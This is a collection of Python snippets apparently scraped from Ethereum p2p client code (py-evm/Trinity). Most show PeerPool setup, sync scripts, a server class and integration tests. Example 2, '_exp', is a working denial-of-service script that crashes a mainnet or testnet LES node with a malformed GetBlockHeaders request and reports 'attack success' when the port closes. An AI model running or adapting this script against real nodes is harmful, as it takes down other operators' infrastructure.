Exemplo n.º 1
0
 def __init__(
     self,
     privkey: datatypes.PrivateKey,
     server_address: Address,
     chaindb: AsyncChainDB,
     bootstrap_nodes: List[str],
     network_id: int,
     min_peers: int = DEFAULT_MIN_PEERS,
     peer_class: Type[BasePeer] = ETHPeer,
 ) -> None:
     self.cancel_token = CancelToken('Server')
     self.chaindb = chaindb
     self.privkey = privkey
     self.server_address = server_address
     self.network_id = network_id
     self.peer_class = peer_class
     # TODO: bootstrap_nodes should be looked up by network_id.
     discovery = DiscoveryProtocol(self.privkey,
                                   self.server_address,
                                   bootstrap_nodes=bootstrap_nodes)
     self.peer_pool = PeerPool(
         peer_class,
         self.chaindb,
         self.network_id,
         self.privkey,
         discovery,
         min_peers=min_peers,
     )
Exemplo n.º 2
0
def _exp(node_url, chain) -> None:

    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncHeaderDB, connect_to_peers_loop

    ip, port = node_url.split('@')[1].split(':')
    if port_probe(ip, port):
        print('The port is open, starting to attack...')
    peer_class = LESPeer
    peer_pool = None
    if chain == 'mainnet':
        block_hash = '0xd4e56740f876aef8c010b86a40d5f56745a118d0906a34e69aec8c0db1cb8fa3'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(MAINNET_GENESIS_HEADER)
        network_id = MainnetChain.network_id
        nodes = [Node.from_uri(node_url)]
        peer_pool = PeerPool(peer_class, headerdb, network_id,
                             ecies.generate_privkey(),
                             MAINNET_VM_CONFIGURATION)
    elif chain == 'testnet':
        block_hash = '0x41941023680923e0fe4d74a34bdac8141f2540e3ae90623718e47d66d1ca4a2d'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(ROPSTEN_GENESIS_HEADER)
        network_id = RopstenChain.network_id
        nodes = [Node.from_uri(node_url)]
        peer_pool = PeerPool(peer_class, headerdb, network_id,
                             ecies.generate_privkey(),
                             ROPSTEN_VM_CONFIGURATION)
    loop = asyncio.get_event_loop()

    async def attack() -> None:
        nonlocal peer_pool
        nonlocal block_hash
        while not peer_pool.peers:
            print("Waiting for peer connection...")
            await asyncio.sleep(1)
        peer = cast(LESPeer, peer_pool.peers[0])
        cmd = GetBlockHeaders(peer.sub_proto.cmd_id_offset)
        data = {
            'request_id':
            1,
            'query':
            GetBlockHeadersQuery(decode_hex(block_hash), 1, 0xffffffffffffffff,
                                 False),
        }
        header, body = cmd.encode(data)
        peer.sub_proto.send(header, body)
        await asyncio.sleep(1)
        result = port_probe(ip, port)
        if not result:
            print('The port is closed,attack success ...')
            exit()

    t1 = asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    t2 = asyncio.ensure_future(attack())
    loop.set_debug(True)
    loop.run_until_complete(asyncio.wait([t1, t2]))
    loop.close()
Exemplo n.º 3
0
def _test() -> None:
    import argparse
    import signal
    from eth.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from tests.trinity.core.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncLevelDB, connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    db = FakeAsyncLevelDB(args.db)
    chaindb = FakeAsyncChainDB(db)
    network_id = RopstenChain.network_id
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    peer_pool = PeerPool(
        ETHPeer, chaindb, network_id, ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    head = chaindb.get_canonical_head()
    downloader = StateDownloader(chaindb, db, head.state_root, peer_pool)
    downloader.logger.setLevel(log_level)
    loop = asyncio.get_event_loop()

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await downloader.cancel()
        loop.stop()

    async def run() -> None:
        await downloader.run()
        downloader.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()
Exemplo n.º 4
0
def _test() -> None:
    import argparse
    import asyncio
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import ETHPeer, DEFAULT_PREFERRED_NODES
    from evm.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (FakeAsyncChainDB,
                                                    FakeAsyncRopstenChain,
                                                    connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-enode',
                        type=str,
                        required=False,
                        help="The enode we should connect to")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chain = FakeAsyncRopstenChain(chaindb)
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()
    peer_pool = PeerPool(ETHPeer, chaindb, network_id, privkey,
                         ROPSTEN_VM_CONFIGURATION)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))

    loop = asyncio.get_event_loop()
    loop.set_default_executor(ProcessPoolExecutor())

    syncer = FullNodeSyncer(chain, chaindb, chaindb.db, peer_pool)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await syncer.cancel()
        await peer_pool.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(syncer.run())
    loop.run_forever()
    loop.close()
Exemplo n.º 5
0
 def __init__(self, privkey: datatypes.PrivateKey, server_address: Address,
              chaindb: AsyncChainDB, bootstrap_nodes: List[str],
              network_id: int) -> None:
     self.cancel_token = CancelToken('Server')
     self.chaindb = chaindb
     self.privkey = privkey
     self.server_address = server_address
     self.network_id = network_id
     # TODO: bootstrap_nodes should be looked up by network_id.
     discovery = DiscoveryProtocol(self.privkey,
                                   self.server_address,
                                   bootstrap_nodes=bootstrap_nodes)
     self.peer_pool = PeerPool(ETHPeer, self.chaindb, self.network_id,
                               self.privkey, discovery)
Exemplo n.º 6
0
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from evm.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB, connect_to_peers_loop
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG
    logging.getLogger('p2p.state.StateDownloader').setLevel(log_level)

    db = LevelDB(args.db)
    chaindb = FakeAsyncChainDB(db)
    network_id = RopstenChain.network_id
    nodes = DEFAULT_PREFERRED_NODES[network_id]
    peer_pool = PeerPool(ETHPeer, chaindb, network_id,
                         ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))

    head = chaindb.get_canonical_head()
    downloader = StateDownloader(db, head.state_root, peer_pool)
    loop = asyncio.get_event_loop()

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await downloader.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(downloader.run())
    loop.run_forever()
    loop.close()
Exemplo n.º 7
0
async def test_peer_pool_connect(monkeypatch, event_loop,
                                 receiver_server_with_dumb_peer):
    started_peers = []

    async def mock_start_peer(peer):
        nonlocal started_peers
        started_peers.append(peer)

    monkeypatch.setattr(receiver_server_with_dumb_peer, '_start_peer',
                        mock_start_peer)
    # We need this to ensure the server can check if the peer pool is full for
    # incoming connections.
    monkeypatch.setattr(receiver_server_with_dumb_peer, 'peer_pool',
                        MockPeerPool())

    pool = PeerPool(DumbPeer, FakeAsyncHeaderDB(MemoryDB()), NETWORK_ID,
                    INITIATOR_PRIVKEY, tuple())
    nodes = [RECEIVER_REMOTE]
    await pool.connect_to_nodes(nodes)
    # Give the receiver_server a chance to ack the handshake.
    await asyncio.sleep(0.1)

    assert len(started_peers) == 1
    assert len(pool.connected_nodes) == 1

    # Stop our peer to make sure its pending asyncio tasks are cancelled.
    await list(pool.connected_nodes.values())[0].cancel()
Exemplo n.º 8
0
async def test_peer_pool_connect(monkeypatch, event_loop,
                                 receiver_server_with_dumb_peer):
    started_peers = []

    def mock_start_peer(peer):
        nonlocal started_peers
        started_peers.append(peer)

    monkeypatch.setattr(receiver_server_with_dumb_peer, '_start_peer',
                        mock_start_peer)

    network_id = 1
    discovery = None
    pool = PeerPool(DumbPeer, HeaderDB(MemoryDB()), network_id,
                    INITIATOR_PRIVKEY, discovery)
    nodes = [RECEIVER_REMOTE]
    await pool._connect_to_nodes(nodes)
    # Give the receiver_server a chance to ack the handshake.
    await asyncio.sleep(0.1)

    assert len(started_peers) == 1
    assert len(pool.connected_nodes) == 1

    # Stop our peer to make sure its pending asyncio tasks are cancelled.
    await list(pool.connected_nodes.values())[0].cancel()
Exemplo n.º 9
0
 def _create_peer_pool(self, chain_config: ChainConfig) -> PeerPool:
     return PeerPool(
         LESPeer,
         self.headerdb,
         chain_config.network_id,
         chain_config.nodekey,
         self.chain_class.vm_configuration,
     )
Exemplo n.º 10
0
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from p2p import kademlia
    from p2p.constants import ROPSTEN_BOOTNODES
    from p2p.discovery import DiscoveryProtocol
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB, LocalGethPeerPool
    logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')
    logging.getLogger('p2p.chain.ChainSyncer').setLevel(logging.DEBUG)

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-local-geth', action="store_true")
    args = parser.parse_args()

    loop = asyncio.get_event_loop()
    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    privkey = ecies.generate_privkey()
    if args.local_geth:
        peer_pool = LocalGethPeerPool(ETHPeer, chaindb, RopstenChain.network_id, privkey)
        discovery = None
    else:
        listen_host = '0.0.0.0'
        listen_port = 30303
        addr = kademlia.Address(listen_host, listen_port, listen_port)
        discovery = DiscoveryProtocol(privkey, addr, ROPSTEN_BOOTNODES)
        loop.run_until_complete(discovery.create_endpoint())
        print("Bootstrapping discovery service...")
        loop.run_until_complete(discovery.bootstrap())
        peer_pool = PeerPool(ETHPeer, chaindb, RopstenChain.network_id, privkey, discovery)

    asyncio.ensure_future(peer_pool.run())
    downloader = ChainSyncer(chaindb, peer_pool)
    # On ROPSTEN the discovery table is usually full of bad peers so we can't require too many
    # peers in order to sync.
    downloader.min_peers_to_sync = 1

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()
        if discovery is not None:
            discovery.stop()
            # Give any pending discovery tasks some time to finish.
            await asyncio.sleep(2)

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)
    loop.run_until_complete(run())
    loop.close()
Exemplo n.º 11
0
 def _make_peer_pool(self) -> PeerPool:
     # This method exists only so that ShardSyncer can provide a different implementation.
     return PeerPool(
         self.peer_class,
         self.headerdb,
         self.network_id,
         self.privkey,
         self.chain.vm_configuration,
         max_peers=self.max_peers,
     )
Exemplo n.º 12
0
def _test():
    import argparse
    import signal
    from p2p import ecies
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-root-hash',
                        type=str,
                        required=True,
                        help='Hex encoded root hash')
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(MemoryDB())
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    peer_pool = PeerPool(ETHPeer, chaindb, RopstenChain.network_id,
                         ecies.generate_privkey())
    asyncio.ensure_future(peer_pool.run())

    state_db = LevelDB(args.db)
    root_hash = decode_hex(args.root_hash)
    downloader = StateDownloader(state_db, root_hash, peer_pool)
    loop = asyncio.get_event_loop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()

    loop.run_until_complete(run())
    loop.close()
Exemplo n.º 13
0
def run_networking_process(chain_config, sync_mode):
    class DBManager(BaseManager):
        pass

    DBManager.register('get_db', proxytype=DBProxy)
    DBManager.register('get_chaindb', proxytype=ChainDBProxy)

    manager = DBManager(address=chain_config.database_ipc_path)
    manager.connect()

    chaindb = manager.get_chaindb()

    if not is_data_dir_initialized(chain_config):
        # TODO: this will only work as is for chains with known genesis
        # parameters.  Need to flesh out how genesis parameters for custom
        # chains are defined and passed around.
        initialize_data_dir(chain_config)

    if not is_database_initialized(chaindb):
        initialize_database(chain_config, chaindb)

    chain_class = get_chain_protocol_class(chain_config, sync_mode=sync_mode)
    peer_pool = PeerPool(LESPeer, chaindb, chain_config.network_id,
                         chain_config.nodekey)

    async def run():
        try:
            asyncio.ensure_future(peer_pool.run())
            # chain.run() will run in a loop until our atexit handler is called, at which point it returns
            # and we cleanly stop the pool and chain.
            await chain.run()
        finally:
            await peer_pool.stop()
            await chain.stop()

    chain = chain_class(chaindb, peer_pool)

    loop = asyncio.get_event_loop()

    try:
        loop.run_until_complete(run())
    except KeyboardInterrupt:
        pass

    def cleanup():
        # This is to instruct chain.run() to exit, which will cause the event loop to stop.
        chain.cancel_token.trigger()

        loop.close()

    atexit.register(cleanup)
Exemplo n.º 14
0
def _test():
    import argparse
    import signal
    from p2p import ecies
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-root-hash', type=str, required=True, help='Hex encoded root hash')
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(MemoryDB())
    chaindb.persist_header_to_db(ROPSTEN_GENESIS_HEADER)
    peer_pool = PeerPool(ETHPeer, chaindb, RopstenChain.network_id, ecies.generate_privkey())
    asyncio.ensure_future(peer_pool.run())

    state_db = LevelDB(args.db)
    root_hash = decode_hex(args.root_hash)
    downloader = StateDownloader(state_db, root_hash, peer_pool)
    loop = asyncio.get_event_loop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()

    loop.run_until_complete(run())
    loop.close()
Exemplo n.º 15
0
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB, LocalGethPeerPool
    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s: %(message)s')
    logging.getLogger('p2p.chain.ChainSyncer').setLevel(logging.DEBUG)

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-local-geth', action="store_true")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    if args.local_geth:
        peer_pool = LocalGethPeerPool(ETHPeer, chaindb,
                                      RopstenChain.network_id,
                                      ecies.generate_privkey())
    else:
        peer_pool = PeerPool(ETHPeer, chaindb, RopstenChain.network_id,
                             ecies.generate_privkey())
    asyncio.ensure_future(peer_pool.run())

    downloader = ChainSyncer(chaindb, peer_pool)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()

    loop = asyncio.get_event_loop()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)
    loop.run_until_complete(run())
    loop.close()
Exemplo n.º 16
0
parser.add_argument('-debug', action='store_true')
args = parser.parse_args()

print("Logging to", LOGFILE)
if args.debug:
    LOGLEVEL = logging.DEBUG
logging.basicConfig(level=LOGLEVEL, filename=LOGFILE)

DemoLightChain = LightChain.configure(
    name='Demo LightChain',
    vm_configuration=MAINNET_VM_CONFIGURATION,
    network_id=ROPSTEN_NETWORK_ID,
)

chaindb = ChainDB(LevelDB(args.db))
peer_pool = PeerPool(LESPeer, chaindb, ROPSTEN_NETWORK_ID,
                     ecies.generate_privkey())
try:
    chaindb.get_canonical_head()
except CanonicalHeadNotFound:
    # We're starting with a fresh DB.
    chain = DemoLightChain.from_genesis_header(chaindb, ROPSTEN_GENESIS_HEADER,
                                               peer_pool)
else:
    # We're reusing an existing db.
    chain = DemoLightChain(chaindb, peer_pool)


async def run():
    asyncio.ensure_future(peer_pool.run())
    # chain.run() will run in a loop until our atexit handler is called, at which point it returns
    # and we cleanly stop the pool and chain.
Exemplo n.º 17
0
def p2p_server(monkeypatch, jsonrpc_ipc_pipe_path):
    monkeypatch.setattr(Server, '_make_peer_pool',
                        lambda s: PeerPool(None, None, None, None, None, None))
    return Server(None, None, None, None, None, None, None)
Exemplo n.º 18
0
class Server(BaseService):
    """Server listening for incoming connections"""
    logger = logging.getLogger("p2p.server.Server")
    _server = None

    def __init__(
        self,
        privkey: datatypes.PrivateKey,
        server_address: Address,
        chaindb: AsyncChainDB,
        bootstrap_nodes: List[str],
        network_id: int,
        min_peers: int = DEFAULT_MIN_PEERS,
        peer_class: Type[BasePeer] = ETHPeer,
    ) -> None:
        super().__init__(CancelToken('Server'))
        self.chaindb = chaindb
        self.privkey = privkey
        self.server_address = server_address
        self.network_id = network_id
        self.peer_class = peer_class
        # TODO: bootstrap_nodes should be looked up by network_id.
        self.discovery = DiscoveryProtocol(self.privkey,
                                           self.server_address,
                                           bootstrap_nodes=bootstrap_nodes)
        self.peer_pool = PeerPool(
            peer_class,
            self.chaindb,
            self.network_id,
            self.privkey,
            self.discovery,
            min_peers=min_peers,
        )

    async def refresh_nat_portmap(self) -> None:
        """Run an infinite loop refreshing our NAT port mapping.

        On every iteration we configure the port mapping with a lifetime of 30 minutes and then
        sleep for that long as well.
        """
        lifetime = 30 * 60
        while not self.is_finished:
            self.logger.info("Setting up NAT portmap...")
            # This is experimental and it's OK if it fails, hence the bare except.
            try:
                await self._add_nat_portmap(lifetime)
            except Exception as e:
                if (isinstance(e, upnpclient.soap.SOAPError)
                        and e.args == (718, 'ConflictInMappingEntry')):
                    # An entry already exists with the parameters we specified. Maybe the router
                    # didn't clean it up after it expired or it has been configured by other piece
                    # of software, either way we should not override it.
                    # https://tools.ietf.org/id/draft-ietf-pcp-upnp-igd-interworking-07.html#errors
                    self.logger.info(
                        "NAT port mapping already configured, not overriding it"
                    )
                else:
                    self.logger.exception("Failed to setup NAT portmap")

            try:
                await wait_with_token(asyncio.sleep(lifetime),
                                      token=self.cancel_token)
            except OperationCancelled:
                break

    async def _add_nat_portmap(self, lifetime: int) -> None:
        loop = asyncio.get_event_loop()
        # Use loop.run_in_executor() because upnpclient.discover() is blocking and may take a
        # while to complete.
        devices = await wait_with_token(loop.run_in_executor(
            None, upnpclient.discover),
                                        token=self.cancel_token,
                                        timeout=2 * REPLY_TIMEOUT)
        if not devices:
            self.logger.info("No UPNP-enabled devices found")
            return
        device = devices[0]
        device.WANIPConn1.AddPortMapping(
            NewRemoteHost=device.WANIPConn1.GetExternalIPAddress()
            ['NewExternalIPAddress'],
            NewExternalPort=self.server_address.tcp_port,
            NewProtocol='TCP',
            NewInternalPort=self.server_address.tcp_port,
            NewInternalClient=self.server_address.ip,
            NewEnabled='1',
            NewPortMappingDescription='Created by Py-EVM',
            NewLeaseDuration=lifetime)
        self.logger.info("NAT port forwarding successfully setup")

    async def _start(self) -> None:
        self._server = await asyncio.start_server(
            self.receive_handshake,
            host=self.server_address.ip,
            port=self.server_address.tcp_port,
        )

    async def _close(self) -> None:
        self._server.close()
        await self._server.wait_closed()

    async def _run(self) -> None:
        self.logger.info("Running server...")
        await self._start()
        self.logger.info(
            "enode://%s@%s:%s",
            self.privkey.public_key.to_hex()[2:],
            self.server_address.ip,
            self.server_address.tcp_port,
        )
        await self.discovery.create_endpoint()
        asyncio.ensure_future(self.refresh_nat_portmap())
        asyncio.ensure_future(self.discovery.bootstrap())
        asyncio.ensure_future(self.peer_pool.run())
        await self.cancel_token.wait()

    async def _cleanup(self) -> None:
        self.logger.info("Closing server...")
        await self.peer_pool.cancel()
        await self.discovery.stop()
        await self._close()

    async def receive_handshake(self, reader: asyncio.StreamReader,
                                writer: asyncio.StreamWriter) -> None:
        expected_exceptions = (TimeoutError, PeerConnectionLost,
                               HandshakeFailure, asyncio.IncompleteReadError,
                               ConnectionResetError, BrokenPipeError)
        try:
            await self._receive_handshake(reader, writer)
        except expected_exceptions as e:
            self.logger.debug("Could not complete handshake", exc_info=True)
        except OperationCancelled:
            pass
        except Exception as e:
            self.logger.exception("Unexpected error handling handshake")

    async def _receive_handshake(self, reader: asyncio.StreamReader,
                                 writer: asyncio.StreamWriter) -> None:
        msg = await wait_with_token(
            reader.read(ENCRYPTED_AUTH_MSG_LEN),
            token=self.cancel_token,
            timeout=REPLY_TIMEOUT,
        )

        ip, socket, *_ = writer.get_extra_info("peername")
        remote_address = Address(ip, socket)
        self.logger.debug("Receiving handshake from %s", remote_address)
        try:
            ephem_pubkey, initiator_nonce, initiator_pubkey = decode_authentication(
                msg, self.privkey)
        except DecryptionError:
            # Try to decode as EIP8
            msg_size = big_endian_to_int(msg[:2])
            remaining_bytes = msg_size - ENCRYPTED_AUTH_MSG_LEN + 2
            msg += await wait_with_token(
                reader.read(remaining_bytes),
                token=self.cancel_token,
                timeout=REPLY_TIMEOUT,
            )
            try:
                ephem_pubkey, initiator_nonce, initiator_pubkey = decode_authentication(
                    msg, self.privkey)
            except DecryptionError as e:
                self.logger.warn("Failed to decrypt handshake", exc_info=True)
                return

        # Create `HandshakeResponder(remote: kademlia.Node, privkey: datatypes.PrivateKey)` instance
        initiator_remote = Node(initiator_pubkey, remote_address)
        responder = HandshakeResponder(initiator_remote, self.privkey,
                                       self.cancel_token)

        # Call `HandshakeResponder.create_auth_ack_message(nonce: bytes)` to create the reply
        responder_nonce = secrets.token_bytes(HASH_LEN)
        auth_ack_msg = responder.create_auth_ack_message(nonce=responder_nonce)
        auth_ack_ciphertext = responder.encrypt_auth_ack_message(auth_ack_msg)

        # Use the `writer` to send the reply to the remote
        writer.write(auth_ack_ciphertext)
        await writer.drain()

        # Call `HandshakeResponder.derive_shared_secrets()` and use return values to create `Peer`
        aes_secret, mac_secret, egress_mac, ingress_mac = responder.derive_secrets(
            initiator_nonce=initiator_nonce,
            responder_nonce=responder_nonce,
            remote_ephemeral_pubkey=ephem_pubkey,
            auth_init_ciphertext=msg,
            auth_ack_ciphertext=auth_ack_ciphertext)

        # Create and register peer in peer_pool
        peer = self.peer_class(remote=initiator_remote,
                               privkey=self.privkey,
                               reader=reader,
                               writer=writer,
                               aes_secret=aes_secret,
                               mac_secret=mac_secret,
                               egress_mac=egress_mac,
                               ingress_mac=ingress_mac,
                               chaindb=self.chaindb,
                               network_id=self.network_id)

        await self.do_handshake(peer)

    async def do_handshake(self, peer: BasePeer) -> None:
        await peer.do_p2p_handshake(),
        await peer.do_sub_proto_handshake()
        self.peer_pool.start_peer(peer)
Exemplo n.º 19
0
async def test_lightchain_integration(request, event_loop, caplog):
    """Test LightChainSyncer/LightPeerChain against a running geth instance.

    In order to run this you need to pass the following to pytest:

        pytest --integration --capture=no --enode=...

    If you don't have any geth testnet data ready, it is very quick to generate some with:

        geth --testnet --syncmode full

    You only need the first 11 blocks for this test to succeed. Then you can restart geth with:

        geth --testnet --lightserv 90 --nodiscover
    """
    # TODO: Implement a pytest fixture that runs geth as above, so that we don't need to run it
    # manually.
    if not pytest.config.getoption("--integration"):
        pytest.skip("Not asked to run integration tests")

    # will almost certainly want verbose logging in a failure
    caplog.set_level(logging.DEBUG)

    remote = Node.from_uri(pytest.config.getoption("--enode"))
    base_db = MemoryDB()
    chaindb = FakeAsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = FakeAsyncHeaderDB(base_db)
    peer_pool = PeerPool(
        LESPeer,
        FakeAsyncHeaderDB(base_db),
        ROPSTEN_NETWORK_ID,
        ecies.generate_privkey(),
        ROPSTEN_VM_CONFIGURATION,
    )
    chain = FakeAsyncRopstenChain(base_db)
    syncer = LightChainSyncer(chain, chaindb, peer_pool)
    syncer.min_peers_to_sync = 1
    peer_chain = LightPeerChain(headerdb, peer_pool)

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, tuple([remote])))
    asyncio.ensure_future(peer_chain.run())
    asyncio.ensure_future(syncer.run())
    await asyncio.sleep(
        0)  # Yield control to give the LightChainSyncer a chance to start

    def finalizer():
        event_loop.run_until_complete(peer_pool.cancel())
        event_loop.run_until_complete(peer_chain.cancel())
        event_loop.run_until_complete(syncer.cancel())

    request.addfinalizer(finalizer)

    n = 11

    # Wait for the chain to sync a few headers.
    async def wait_for_header_sync(block_number):
        while headerdb.get_canonical_head().block_number < block_number:
            await asyncio.sleep(0.1)

    await asyncio.wait_for(wait_for_header_sync(n), 5)

    # https://ropsten.etherscan.io/block/11
    header = headerdb.get_canonical_block_header_by_number(n)
    body = await peer_chain.get_block_body_by_hash(header.hash)
    assert len(body['transactions']) == 15

    receipts = await peer_chain.get_receipts(header.hash)
    assert len(receipts) == 15
    assert encode_hex(keccak(rlp.encode(receipts[0]))) == (
        '0xf709ed2c57efc18a1675e8c740f3294c9e2cb36ba7bb3b89d3ab4c8fef9d8860')

    assert len(peer_pool) == 1
    head_info = peer_pool.highest_td_peer.head_info
    head = await peer_chain.get_block_header_by_hash(head_info.block_hash)
    assert head.block_number == head_info.block_number

    # In order to answer queries for contract code, geth needs the state trie entry for the block
    # we specify in the query, but because of fast sync we can only assume it has that for recent
    # blocks, so we use the current head to lookup the code for the contract below.
    # https://ropsten.etherscan.io/address/0x95a48dca999c89e4e284930d9b9af973a7481287
    contract_addr = decode_hex('0x8B09D9ac6A4F7778fCb22852e879C7F3B2bEeF81')
    contract_code = await peer_chain.get_contract_code(head.hash,
                                                       contract_addr)
    assert encode_hex(contract_code) == '0x600060006000600060006000356000f1'

    account = await peer_chain.get_account(head.hash, contract_addr)
    assert account.code_hash == keccak(contract_code)
    assert account.balance == 0
Exemplo n.º 20
0
def _test():
    import argparse
    import signal
    from evm.chains.mainnet import (MAINNET_GENESIS_HEADER,
                                    MAINNET_VM_CONFIGURATION,
                                    MAINNET_NETWORK_ID)
    from evm.chains.ropsten import ROPSTEN_GENESIS_HEADER, ROPSTEN_NETWORK_ID
    from evm.db.backends.level import LevelDB
    from evm.exceptions import CanonicalHeadNotFound
    from p2p import ecies
    from p2p.integration_test_helpers import LocalGethPeerPool

    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s: %(message)s')
    logging.getLogger("p2p.lightchain.LightChain").setLevel(logging.DEBUG)

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-mainnet', action="store_true")
    parser.add_argument('-local-geth', action="store_true")
    args = parser.parse_args()

    GENESIS_HEADER = ROPSTEN_GENESIS_HEADER
    NETWORK_ID = ROPSTEN_NETWORK_ID
